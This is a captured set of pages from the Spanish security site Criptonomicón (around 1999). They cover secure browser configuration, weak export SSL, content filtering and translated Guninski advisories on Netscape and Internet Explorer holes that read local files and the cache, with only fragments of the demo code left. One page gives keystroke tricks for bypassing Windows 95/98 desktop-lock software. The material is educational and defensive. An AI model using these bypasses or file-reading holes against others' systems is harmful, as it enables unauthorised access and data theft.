servidores annimos que piden como contrasea la direccin de correo del cliente.
Los navegadores incorporan entre los protocolos que soportan el citado FTP, de
manera que se encargan automticamente de recuperar ficheros a travs de este
protocolo sin que el usuario tenga que hacer nada especial adems de pulsar sobre un
simple enlace. Aprovechndose de esta tcnica, algunos sitios web insertan en sus
pginas imgenes u otros elementos que se recuperan a travs de FTP, en vez de
utilizar el protocolo convencional HTTP, de manera que si la opcin de suministrar
la direccin de correo como contrasea estaba activada en el navegador, se harn con
la direccin electrnica del usuario. Para prevenir este tipo de ataque encubierto,
conviene desactivar la casilla.
Las cookies son esos pequeos ficheros de texto que se almacenan en su disco duro
con informacin que algunos servidores Web escriben ah (vea el curso sobre
cookies). Por defecto, est activada la opcin de aceptar todas las cookies. Ahora
bien, resulta peligroso aceptar cookies? En principio, las cookies no revisten
ninguna amenaza para la seguridad; sin embargo, utilizadas por ciertas compaas sin
escrpulos, pueden ayudar a la confeccin de perfiles de usuario y hbitos de
navegacin, bsicamente con el fin de dirigirles propaganda personalizada. No
obstante, seleccionar la opcin de deshabilitar las cookies puede conducir a que
muchos sitios web no se visualicen correctamente o con sus plenas capacidades,
como ocurre por ejemplo con el uso de carritos de la compra o la configuracin
personalizada de servicios (por ejemplo, la web de venta de libros amazon.com). Por
otro lado, debido al uso masivo de cookies que hacen algunos servidores web,
seleccionar la casilla de avisar antes de aceptar cookies puede acabar inundando al
navegante con ventanas de aviso de cookies. Por lo tanto, como solucin intermedia,
se recomienda aceptar todas las cookies en aquellos sitios de confianza, con una
poltica de privacidad claramente establecida y deshabilitarlas en el resto. Los
navegantes ms intrpidos pueden instalar alguno de los programas recomendados en
el boletn, que permiten un filtrado selectivo de cookies en funcin del servidor que
las enva.
Bajo la opcin Cache se pueden configurar los aspectos relacionados con la cache

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/preferencias.html (4 of 5) [25/10/2000 02:31:25 p.m.]

Configuracin segura de Netscape Communicator

donde se almacenan temporalmente las pginas e imgenes visitadas ms


recientemente. Si bien su funcin primaria es aumentar la velocidad de navegacin,
leyendo las pginas ya visitadas desde la cache en lugar de descargarlas de nuevo a
travs de la Red, en la prctica se puede explotar para conocer las idas y venidas de
un navegante, ya que contiene cada pgina e imagen que vio, los archivos de audio
que escuch, etc. Por esta razn, conviene en primer lugar cambiar el directorio por
defecto donde se almacena. En segundo lugar, para los usuarios ms preocupados por
su intimidad, se puede poner a cero de manera que nada se almacene en el disco.
Puede hacer la siguiente prueba: escriba
about:cache
en la ventana de direccin y compruebe cmo aparece en la ventana del navegador la
lista completa de los ltimos sitios que ha visitado, imgenes cargadas, documentos
Word o PDF ledos, presentaciones en PowerPoint visualizadas, etc. Para comprobar
el cache de memoria, puede escribir en la ventana de direccin:
about:memory-cache
Bajo la opcin Proxies encontrar todas las opciones para configurar el
funcionamiento del proxy. La idea bsica de un servidor proxy es actuar de pasarela
(gateway) entre su mquina o su red e Internet. Normalmente se usan para llevar las
peticiones del cliente a travs de un cortafuegos (firewall): el proxy espera a una
peticin desde dentro del cortafuegos y la reexpide al servidor remoto en el exterior
del mismo, lee la respuesta y la enva de vuelta al cliente. Dado que todas las
peticiones pasan a travs del proxy, si un atacante introdujera en su configuracin sin
que se diera usted cuenta la direccin de un servidor proxy correspondiente a una de
sus mquinas, este servidor registrara todos los sitios que visita y los datos que
introduce en los formularios. Por otro lado, siempre que navegue a travs de un
proxy, los servidores web vern la direccin del proxy y no la de su mquina, por lo
que los proxies pueden ser utilizados para la navegacin annima. Para ms
informacin sobre los proxies consulte la seccin sobre anonimato.
Autoinstall/SmartUpdate. A partir de las versiones 4.x es posible instalar
automticamente los plug-in necesarios para visualizar ficheros especiales. Aunque
representa una opcin muy cmoda para el navegante, se recomienda desactivar la
casilla de permitir la autoinstalacin en las versiones 4.0x (en la carpeta de
Avanzadas), mientras que se debe activar la casilla de solicitar confirmacin
manual para cada instalacin en la versin 4.5. No le conviene que ningn tipo de
software se instale en su ordenador sin su conocimiento.

Copyright 1997-1999 Gonzalo lvarez Maran. Todos los derechos reservados.


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/preferencias.html (5 of 5) [25/10/2000 02:31:25 p.m.]

Informacin sobre seguridad

Obtener un navegador vlido


Configuracin segura de
Netscape Communicator
Configuracin segura de
Internet Explorer

Informacin sobre seguridad


Adems de todas las opciones anteriores, que aunque no estn
directamente relacionadas con la seguridad s que la afectan,
Netscape incorpora toda una serie de opciones para ofrecer una
seguridad robusta en la navegacin y en el correo electrnico.

Preferencias
Informacin de
seguridad
Netwatch

La ventana Informacin sobre Seguridad se abre


pulsando sobre el candado de la barra de herramientas o en el men
Communicator/Herramientas. Esta ventana proporciona informacin acerca
del estado de seguridad actual de un elemento particular cuando se selecciona en una
ventana. Cuando se navega o se leen mensajes de correo, si se pincha en el icono del
candado que aparece a la parte inferior izquierda de la barra de estado, se invocar
esta ventana con la informacin de seguridad de la pgina Web o del mensaje que se
estaba viendo.
En Contraseas, puede establecer la contrasea para acceder a la base de datos
personal con sus certificados y su clave privada. Se recomienda que la establezca
para evitar que personas con acceso a su ordenador utilicen sus certificados sin su
conocimiento. Si lo hace, tenga en cuenta que si olvida la contrasea ya no podr
acceder a sus certificados ni descifrar mensajes nuevos o antiguos.
En Navigator se pueden configurar las opciones de advertencia que le alertan de
posibles situaciones de riesgo, como se ve en la Figura. Resulta una buena idea
activar todos los avisos, por las siguientes razones:
Entrar en un sitio cifrado: dado que las pginas se descifran
automticamente sin su intervencin, a lo mejor le interesa borrar o guardar en
un lugar seguro algn fichero descargado al finalizar la sesin.
Salir de un sitio cifrado: podra interesarle borrar los ficheros
descifrados que hayan quedado en su disco, ya que las pginas web solamente
estn cifradas durante la transmisin, no al almacenarse en disco.
Ver una pgina con una combinacin de informacin
cifrada/descifrada: esta advertencia aparecer cuando una pgina
contenga elementos cifrados y elementos sin cifrar, como por ejemplo

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/infoseguridad.html (1 of 3) [25/10/2000 02:31:26 p.m.]

Informacin sobre seguridad

imgenes o applets de Java. Si considera que su sistema no est protegido,


podra desear no abrir esta pgina.
Enviar informacin no cifrada al sitio: le recuerda que no
debe transmitir formularios o informacin sin cifrar a travs del correo. Esta es
la advertencia ms importante y que siempre debera estar activada, aunque
aparezca cada vez que hacemos una bsqueda o firmamos en un libro de
visitas. Una lista desplegable le permite elegir cmo quiere que se comporte
Navigator cuando un sitio web le pide su certificado. Si visita mltiples sitios
web que requieren distintos tipos de certificado, elija Preguntar cada
vez. En caso contrario, elija Seleccionar automticamente. La
configuracin de seguridad avanzada slo debera ser modificada por expertos.
En cualquier caso, si se le echa un vistazo, se comprobar que las versiones de
exportacin (como la que se distribuye en Espaa) incorporan claves dbiles.
En consecuencia, en cuestin de horas se pueden descifrar mensajes cifrados
con SSL utilizando varios ordenadores trabajando en paralelo. A ttulo de
ejemplo, en un concurso convocado por la Facultad de Informtica de la
Universidad Politcnica de Madrid, en diciembre de 1998 un grupo de
estudiantes logr romper y descifrar en pocos das un mensaje RC2 de 40 bits,
que es el que usa NetScape.
En Messenger se puede configurar el envo cifrado y firmado de mensajes.
Los usuarios espaoles comprobarn que el mtodo de cifrado S/MIME
utilizado es RC2 con clave corta de 40 bits y por lo tanto fcil de romper.

En Java/JavaScript se administran los permisos con los que las applets de Java
y los programas en JavaScript que estn firmados correctamente accedern a su
sistema. Resulta extremadamente peligroso que estos programas gocen de privilegios
excesivos, como lectura/escritura en disco o posibilidad de conexiones a travs de
Internet. Por este motivo, resulta ms seguro, aunque tambin ms engorroso,
eliminar de la lista los sitios web, los vendedores y los distribuidores que estn
presentes, o cuando menos editar y verificar sus permisos, eliminando los que
requieran privilegios de ms alto riesgo, de manera que en el futuro se le pida
autorizacin cada vez que se pretenda realizar una operacin comprometida, en vez
de concederla automticamente.
En Certificados se gestionan los certificados con los que opera Navigator, tanto
los propios, para que usted se identifique ante otras personas o pginas web, como
los ajenos, para que otros se identifiquen ante usted. Adems aparecen los
certificados que ha aceptado de sitios web, as como los de las entidades firmantes,
que dan validez a todos los certificados anteriores. Conviene que los proteja con
contrasea, como se describi ms arriba. Adems es muy recomendable que realice
copias de sus certificados y los conserve en un sitio seguro, ya que si los pierde o
borra accidentalmente, ser incapaz de leer el correo cifrado recibido ni se podr
identificar ante los sitios web. Para ms informacin, consulte la pgina Obtener un
certificado.
En Mdulos Criptogrficos se pueden aadir mdulos criptogrficos para

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/infoseguridad.html (2 of 3) [25/10/2000 02:31:26 p.m.]

Informacin sobre seguridad

realizar tareas especializadas como soporte de tarjetas inteligentes, esquemas de


distribucin de claves o compatibilidad FIPS.

Copyright 1997-1999 Gonzalo lvarez Maran. Todos los derechos reservados.


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/infoseguridad.html (3 of 3) [25/10/2000 02:31:26 p.m.]

Netwatch

Obtener un navegador vlido


Configuracin segura de
Netscape Communicator
Configuracin segura de
Internet Explorer

Netwatch
NetWatch es la proteccin basada en restricciones por contenidos
incorporada por Netscape Navigator 4.5, que le permitir
controlar qu clase de pginas web se pueden visualizar en su
ordenador.

Preferencias
Informacin de
seguridad

Netwatch
NetWatch de Netscape utiliza el estndar de clasificacin
conocido como PICS. NetWatch reconoce dos sistemas de clasificacin
independientes compatibles con PICS: RSACi, y SafeSurf. Cada sistema emplea un
mtodo diferente para describir con el mayor detalle posible los niveles de contenido
potencialmente ofensivo en las pginas web. Estos contenidos se agrupan en las
siguientes categoras: violencia, desnudez, sexo y lenguaje. SafeSurf aade, adems,
otros contenidos, como profanidad, heterosexualidad, homosexualidad, intolerancia
racial, sexual o religiosa, drogas, juego, etc.

Una vez que la proteccin de NetWatch ha sido activada, cuando se accede a una
pgina con Netscape Navigator, NetWatch compara la clasificacin de la pgina con
los niveles que han sido configurados como aceptables y si todos los niveles de la
pgina son inferiores se permite su visualizacin. Tambin se puede bloquear todas
las pginas que carezcan de clasificacin, si bien esta opcin limitara drsticamente
la navegacin por Internet, ya que son muy pocas las pginas que actualmente
incorporan clasificacin.
Con el fin de evitar que otros usuarios vean o cambien su configuracin, sta se
protege mediante una contrasea. A partir del momento en que se activa la
proteccin de NetWatch, nadie que use su navegador podr saltrsela.
Puede configurar NetWatch si lo desea, seleccionando el comando NetWatch del
men Ayuda.

Copyright 1997-1999 Gonzalo lvarez Maran. Todos los derechos reservados.


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/netwatch.html (1 of 2) [25/10/2000 02:31:26 p.m.]

Netwatch
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/netwatch.html (2 of 2) [25/10/2000 02:31:26 p.m.]

PICS

Obtener un navegador vlido


Configuracin segura de
Netscape Communicator
Configuracin segura de
Internet Explorer

PICS
Restriccin de contenidos en Internet sin censura

Preferencias

Informacin de
Del mismo modo que no todo el contenido que se emite por TV es
seguridad
apropiado para todas las audiencias, no todas las pginas Web
estn hechas para todos los ojos: sexo, violencia, lenguaje de mal
Netwatch
gusto, desnudez, racismo... A la censura en Internet le gustara con
toda seguridad prohibir pginas con tales contenidos. Afortunadamente, antes de que
los gobiernos llegaran a esos extremos, se desarroll la especificacin PICS
(Plataforma para la Seleccin de Contenido en Internet), que permite la asociacin de
etiquetas (metadatos) con el contenido de las pginas Web en Internet. Fue diseado
originalmente para ayudar a los padres, educadores y empresarios a controlar el
contenido al que acceden los nios o los empleados, filtrando todo aquello que
consideren inapropiado para ellos. PICS facilita tambin otras aplicaciones de
etiquetado, como la descripcin del contenido de las pginas Web, la firma de cdigo
y la privacidad.

La plataforma establece las convenciones que deben seguir los formatos de etiquetas
y los mtodos de distribucin, sin pronunciarse en absoluto acerca del vocabulario de
las etiquetas o quin debera prestar atencin a qu etiquetas. Resulta anlogo a
especificar dnde debera aparecer una etiqueta de advertencia en un paquete de
tabaco y con qu tipo de letra, pero sin especificar lo que debe decir ni quin debe
hacerle caso.
Para ms informacin se puede acudir a la pgina Web de la plataforma.

Copyright 1997-1999 Gonzalo lvarez Maran. Todos los derechos reservados.


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/pics.html [25/10/2000 02:31:26 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/images/navigator.gif

file:///C|/TEMP/criptonomicon/criptonomicon/images/navigator.gif [25/10/2000 02:31:26 p.m.]

Es probable que ya me hayas enviado un mail

Hala, t sigue enviando mails!


Si te atreves, pincha en el botn:
Suscripcin gratis

Botn completamente seguro


Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

Link completamente seguro!


Cada vez que pinchas en el botn "completamente seguro" o simplemente, cada vez
que pasas el ratn sobre el link "completamente seguro", me ests enviando un
correo electrnico, del cual puedo extraer tu direccin de e-mail, por supuesto. Te
das cuenta? Puedo utilizarla para muchos fines. Algunos tal vez desgradables para ti.
Esto puede sucederte en cualquier lugar de la red por el que navegues.
As que la prxima vez s ms cauteloso y no reveles tus datos personales.
Nota - Esta demostracin de (in)seguridad funciona en todas las versiones de
Netscape, pero no en versiones de MS Internet Explorer anteriores a la 4.0. Cuanto
ms antigua sea la versin de Netscape , mejor funciona... y peor para tu seguridad!

Que pases un buen da... sin ninguna


intimidad!

JavaScript

Cookies
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Crashes
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/enviomail.html (1 of 2) [25/10/2000 02:31:27 p.m.]

Es probable que ya me hayas enviado un mail


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/enviomail.html (2 of 2) [25/10/2000 02:31:27 p.m.]

Agujeros de seguridad del Netscape

Agujeros de seguridad del Netscape


Guninsky
Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Lectura del cache

Otra lectura del cache

Lectura de directorios

Lectura de ficheros locales (Windows)

Lectura de ficheros locales (Unix)

Brumleve
Quiero ver lo chungo que tambin lo tiene el Explorer

Navegacin segura

Control de acceso
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
CGI

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/agujeros/netscape.html (1 of 2) [25/10/2000 02:31:27 p.m.]

Agujeros de seguridad del Netscape


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/agujeros/netscape.html (2 of 2) [25/10/2000 02:31:27 p.m.]

Read Netscape 4.07 cache

Existe un agujero en Netscape Communicator 4.07 (Win95), 4.05 (WinNT 4.0) (y probablemente otros)
que permite leer el cache de un usario (incluyendo la informacin en los formularios enviados con
GET). Esta informacin podra ser enviada a un sercidor arbitrario, incluso aunque el usuario se
encuentre detrs de un firewall.
Parte del cdigo lo he tomado prestado de Dan Brumleve (nothing@shout.net).
Solucin: Desactivar Javascript.
Puedes comprobar el agujero que permite leer el cache.
Traduccin de la pgina de Georgi Guninski.

file:///C|/TEMP/criptonomicon/criptonomicon/agujeros/gunnets1.html [25/10/2000 02:31:27 p.m.]

Submit

Read Netscape 4.5 cache

Existe un agujero en Netscape Communicator 4.07 (Win95), 4.05 (WinNT 4.0) (y probablemente otros)
que permite leer el cache de un usario (incluyendo la informacin en los formularios enviados con GET).
Tambin es posible leer los contenidos de directorios. Esta informacin podra ser enviada a un sercidor
arbitrario.
Solucin: Desactivar Javascript.
';return s};f()"; sl2.location.reload();
Traduccin de la pgina de Georgi Guninski

file:///C|/TEMP/criptonomicon/criptonomicon/agujeros/gunnets2.html [25/10/2000 02:31:28 p.m.]

Browse directories with Netscape 4.5

Existe un agujero en Netscape Communicator 4.5, 4.07, 3.04 for Windows 95 (y probablemente otros)
que permite leer el cache de un usario (incluyendo la informacin en los formularios enviados con GET).
Tambin es posible leer los contenidos de directorios. Esta informacin podra ser enviada a un sercidor
arbitrario.
Solucin: Desactivar Javascript.
';return s};f()"; sl2.location.reload();
Traduccin de la pgina de Georgi Guninski

file:///C|/TEMP/criptonomicon/criptonomicon/agujeros/gunnets3.html [25/10/2000 02:31:28 p.m.]

Reading local files with Netscape Communicator 4.5

Existe un agujero en Netscape Communicator 4.5 para Windows 95 (y probablemente otros) que permite
leer ficheros del disco duro de un usuario. No es necesario conocer el nombre del fichero, dado que se
pueden examinar los directorios. Los contenidos del fichero se podran enviar a un host arbitrario. Para
que funcione, se necesita que tanto Java como JavaScript estn activados.
Solucin: Desactivar Javascript o Java.
Traduccin de la pgina de Georgi Guninski
'";

file:///C|/TEMP/criptonomicon/criptonomicon/agujeros/gunnets4.html [25/10/2000 02:31:28 p.m.]

Reading local files with Netscape Communicator 4.5

Existe un agujero en Netscape Communicator 4.5 para mquinas Unix que permite leer ficheros del disco
duro de un usuario. No es necesario conocer el nombre del fichero, dado que se pueden examinar los
directorios. Los contenidos del fichero se podran enviar a un host arbitrario. Para que funcione, se
necesita que tanto Java como JavaScript estn activados.
Solucin: Desactivar Javascript o Java.
Adaptacin para Unix del agujero descrito en la pgina de Georgi Guninski
'";

file:///C|/TEMP/criptonomicon/criptonomicon/agujeros/gunnets4linux.html [25/10/2000 02:31:28 p.m.]

Agujeros de seguridad del Explorer

Agujeros de seguridad del Explorer


Suscripcin gratis

Intimidad?

Artculos

En esta seccin he recopilado una serie de agujeros de seguridad recientes


descubiertos en los ltimos meses de 1998, que afectan principalemente a las
versiones 4.x de Microsoft Internet Explorer.

Guninsky

El problema de embeber objetos.

Desbordamiento de bfer en la etiqueta OBJECT.

Desbordamiento de bfer en JScript.

IE puede leer ficheros locales.

Seguridad

Linux

Navegacin segura

Control de acceso

Cuartango
Quiero ver lo chungo que tambin lo tiene Netscape

CGI
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Java
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/agujeros/msie.html (1 of 2) [25/10/2000 02:31:28 p.m.]

Agujeros de seguridad del Explorer


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/agujeros/msie.html (2 of 2) [25/10/2000 02:31:28 p.m.]

Intentar el crash de Explorer

Intentando que se cuelgue


Este crash se debe a Georgi Guninski

file:///C|/TEMP/criptonomicon/criptonomicon/agujeros/gunmsie1.html [25/10/2000 02:31:29 p.m.]

Intentando colgar IE

Intentando colgar IE
Agujero descubierto por Georgi Guninski

file:///C|/TEMP/criptonomicon/criptonomicon/agujeros/gunmsie2.html [25/10/2000 02:31:29 p.m.]

Intentando colgar IE

Javascript external.AAAAA........... para colgar IE


Agujero descubierto por Georgi Guninski

file:///C|/TEMP/criptonomicon/criptonomicon/agujeros/gunmsie3.html [25/10/2000 02:31:29 p.m.]

Leer un fichero de texto/HTML con Internet Explorer 4.01

Esta pgina demuestra un agujero en IE 3, 4.0, 4.01, que permite leer un fichero de texto o HTML del
disco duro del usuario.
Otra forma de explotar este agujero es enviando un mensaje especialmente diseado a un usuario de
Outlook Express/IE4.
Para ver en funcionamiento este agujero, crea el fichero c:\test.txt y sus contenidos se mostrarn en una
ventana de alerta. El fichero podra ser enviado a un servidor arbitrario incluso detrs de un firewall.
Para probarlo, debes tener activado Javascript.
Esta pgina es una traducin de la pgina creada por Georgi Guninski.

file:///C|/TEMP/criptonomicon/criptonomicon/agujeros/gunmsie4.html [25/10/2000 02:31:29 p.m.]

Obtencin de una copia segura de Netscape Communicator

Obtener un navegador vlido


Configuracin segura de
Netscape Communicator
Configuracin segura de
Internet Explorer

Obtencin de una copia segura


de Netscape Communicator

Netscape
Communicator
Intenet Explorer

Existe solucin?
El 23 de enero de 1998 la compaa Netscape Communications
realiz dos importantes anuncios pblicos: primero, que su producto ms conocido y
extendido entre los usuarios de Internet, Netscape Communicator, sera gratuito y se
podra descargar desde su web; y segundo, que el cdigo fuente del Communicator
sera tambin de dominio pblico y gratis, pudindose descargar desde la web de la
Organizacin Mozilla.

Desde que el cdigo fuente se encuentra disponible libremente, de manera que


cualquiera puede examinarlo y modificarlo, la posibilidad de alteraciones maliciosas
se transforma en una amenaza muy real. Un individuo malintencionado podra
cambiar secciones del cdigo de manera que Communicator pirateado llevara a la
prctica todos o alguno de los ataques citados antes u otros que se le podran ocurrir.
Ahora bien, una vez modificado, el pirata debera ingenirselas para distribuir su
copia entre los usuarios. Se pueden imaginar con facilidad una serie de alternativas
que se le ofrecen, desde incluirlo en un CD de programas piratas de los que se
venden en Internet, ponerlo en su pgina web para que lo descarguen navegantes
ingenuos o incluso falsificar la web de Netscape o una porcin de ella para hacer
creer a los usuarios que se estn conectando a la pgina oficial de descarga de
Netscape Communicator en vez de a su falsificacin.
En definitiva, existe todo un abanico de posibilidades desplegado, cuya eficacia y
potencialidad de llegar a ms o menos usuarios depender en gran medida de la
ingenuidad de stos y del ingenio de aqul.

Copyright 1997-1999 Gonzalo lvarez Maran. Todos los derechos reservados.


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/valnetscape.html [25/10/2000 02:31:30 p.m.]

Obtencin de una copia segura de Internet Explorer

Obtener un navegador vlido


Configuracin segura de
Netscape Communicator
Configuracin segura de
Internet Explorer

Obtencin de una copia segura


de Internet Explorer

Netscape Communicator
Intenet Explorer
Existe solucin?

En el caso de Internet Explorer, esta cuestin no reviste un grave


problema, en la medida en que se instale una versin oficial de Windows, ya que el
explorador viene incorporado en la distribucin original junto con el sistema
operativo. Sin embargo, con la proliferacin de CD piratas que incluyen tambin
versiones de Windows 95/98 o simplemente el navegador Internet Explorer, de
nuevo se presenta el riesgo de obtener versiones modificadas.
No obstante, en este caso, al no encontrarse libremente disponibles el cdigo fuente
del programa explorador, el peligro de modificacin se minimiza prcticamente a
cero.

Copyright 1997-1999 Gonzalo lvarez Maran. Todos los derechos reservados.


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/valmicrosoft.html [25/10/2000 02:31:30 p.m.]

Existe solucin?

Obtener un navegador vlido


Configuracin segura de
Netscape Communicator
Configuracin segura de
Internet Explorer

Existe solucin?

Netscape Communicator
Intenet Explorer

La solucin a este problema (que no se limita a los navegadores


Existe solucin?
sino a cualquier software que se descarga comnmente desde la
Red, como por ejemplo los clientes de IRC, utilizados para charlar en Internet
chatting) se encuentra en la firma digital del cdigo.
El cdigo firmado digitalmente le proporciona al usuario la certeza de que procede
de una compaa de confianza y de que no ha sido modificado maliciosamente en
ningn momento desde que fue firmado por la casa que lo distribuye hasta que lleg
a sus manos, dotando as a los productos de garantas similares a las que poseen los
adquiridos dentro de su caja sellada en tiendas de informtica.
Mientras estas tcnicas se extienden y su uso se vuelve ms frecuente, conviene
extremar las precauciones a la hora de instalar el navegador, desconfiando de sitios
web sospechosos y de CD-ROM con software pirata. Se recomienda descargar estos
programas desde los sitios oficiales, tanto el de Netscape para el Communicator
como el de Microsoft para Internet Explorer.

Copyright 1997-1999 Gonzalo lvarez Maran. Todos los derechos reservados.


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/solucion.html [25/10/2000 02:31:30 p.m.]

La crisis de los escritorios seguros

Consejos para
administradores
Consejos para
usuarios

La crisis de los escritorios seguros


Como todos sabemos, Windows 95/98 es inseguro por antonomasia. Para evitar que
distintos usuarios sentados en el ordenador, aunque entrando cada uno con su nombre
y contrasea, puedan acceder a todos los ficheros del disco duro, existen en el
mercado multitud de productos para asegurar el escritorio: Full Armor, Fool Proof,
Fortres, etc.
Desgraciadamente, existen mtodos que nos permiten saltarnos esa proteccin, como
describo a continuacin.
1. Al encender el ordenador, se produce un intervalo de un par de segundos desde
que ves aparecer tu escritorio hasta que ves abajo la barra del explorador. Si durante
ese intervalo se presiona ctrl+alt+supr, se cargar el administrador de tareas, que te
permite ahora ya ejecutar absolutamente lo que quieras.
2. Si se pulsa ctrl+esc cuando Windows pide el nombre y contrasea, se lanza
tambin el administrador de tareas. Desde ah ya ejecutas los programas que quieras,
puedes abrir archivos, etc.
Explicacin: estos mtodos se saltan la proteccin del escritorio puesto que todava
Windows 95/98 no ha tenido tiempo de cargarla, y dado que Windows 95/98 es
inherentemente inseguro, no hay ninguna otra proteccin.
SOLUCIONES
Para que los protectores del escritorio sigan siendo relativamente eficaces a pesar de
estas formas de saltrselos, podis probar lo siguiente:
1. Aade lo siguiente al fichero MSDOS.SYS debajo de la seccin [Options]:
BootSafe=0 BootKeys=0 BootWarn=0 AutoScan=0 Network=1 (si ests en red)
DOS no es muy seguro, en cualquier caso, as que puede que esto no mejore en
mucho la situacin.
2. Cambia el nombre al adminstrador de tareas o brralo. Por ejemplo, en vez de
taskman.exe, llmalo tasman.exe o lo que quieras, da igual.
Moraleja de la historia: si buscas seguridad, no uses JAMS Windows 95/98.
Participa con tus consejos y trucos

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/escritorios.html (1 of 2) [25/10/2000 02:31:31 p.m.]

La crisis de los escritorios seguros

Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/escritorios.html (2 of 2) [25/10/2000 02:31:31 p.m.]

Estamos seguros con SSL?

Consejos para
administradores
Consejos para
usuarios

Estamos seguros con SSL?


Debido a la limitacin de exportacin del gobierno de los Estados Unidos sobre los
productos criptogrficos, las versiones de los navegadores distribuidas legalmente
ms all de sus fronteras operan con nada ms que 40 bits de clave, frente a los 128
256 bits de las versiones fuertes. Claves tan cortas facilitan los ataques de fuerza
bruta por bsqueda exhaustiva de claves, pudindose descifrar mensajes cifrados en
estas condiciones tan desfavorables en cuestin de horas o das, dependiendo de los
recursos informticos disponibles.
Al menos para aplicaciones financieras las restricciones de exportacin se relajan,
permitiendo hacer uso de criptografa fuerte.
Si utilizas versiones de los navegadores 4.x o superiores, entonces al conectarte a tu
banco para operaciones de telebanca, tu navegador utilizar automticamente claves
de 128 bits, establecindose un canal de comunicaciones completamente seguro.
Cuando navegues por un sitio seguro con Netscape Communicator, encontrars tres
indicaciones de que ests en un sitio seguro: un candado cerrado en la barra de
herramientas, otro en la parte inferior izquierda de la barra de estado y el cambio al
protocolo https, en la ventana de direccin. Para saber con cuntos bits de clave est
utilizando tu navegador, pincha en el candado de la barra de estado. Se abrir una
ventana llamada informacin sobre seguridad. Pulsa el botn "Abrir informacin
sobre pgina" y en esta nueva ventana vers una lnea titulada "Seguridad". Ah se te
informa del algoritmo de cifrado y del nmero de bits de clave. Si es 40, entonces tu
canal no es en absoluto seguro.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/ssl.html (1 of 3) [25/10/2000 02:31:31 p.m.]

Estamos seguros con SSL?

Cuando navegues por un sitio seguro con Internet Explorer, encontrars dos
indicaciones: un candado cerrado en la parte inferior central de la barra de estado y el
